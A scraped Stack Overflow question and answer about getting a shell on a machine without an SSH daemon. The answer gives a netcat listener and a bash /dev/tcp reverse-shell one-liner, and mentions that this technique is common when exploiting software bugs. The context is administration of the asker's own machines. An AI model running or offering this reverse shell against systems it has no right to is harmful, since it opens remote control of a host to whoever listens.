问题
I have a machine without SSHD and I want to open a bash shell on this machine from a remote machine (that I can fully control).
Since I have SSH on my limited machine, I configured a reverse proxy:
$ ssh -R 19999:localhost:22 remoteuser@remotemachine
Now I have a connection on port 19999 from my "fully control" machine to my "limited" machine. How would I open a shell with this setup?
回答1:
You can pipe the input from some port directly to the bash. This is common practice when misusing various bugs in software. For example, run on your full-access machine:
nc -lvp 9999
And on the limited machine
/bin/bash -i >& /dev/tcp/192.168.122.1/9999 0>&1
Where the 192.168.122.1 is the IP of the full-control machine.
This will give you a shell of the second machine in the first one. But note that the connection is not encrypted. If you want encryption, you would need to add the TCP forwarding step (similar as you propose above).
来源:https://stackoverflow.com/questions/38828725/how-to-open-a-shell-without-sshd-on-the-receiving-end